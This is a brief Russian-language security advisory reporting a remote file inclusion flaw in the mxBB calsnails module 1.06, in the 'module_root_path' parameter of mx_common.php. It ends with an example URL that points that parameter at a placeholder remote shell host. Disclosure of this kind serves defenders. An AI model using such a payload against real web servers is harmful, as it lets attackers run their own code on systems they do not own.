Программа: mxBB calsnails module 1.06
Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных в параметре «module_root_path» сценарием mx_common.php. Атакующий может выполнить произвольный сценарий в контексте безопасности Web сервера.
Пример:
http://[site]/[path]/includes/mx_common.php?module_root_path=http://Y0urSh3LL?
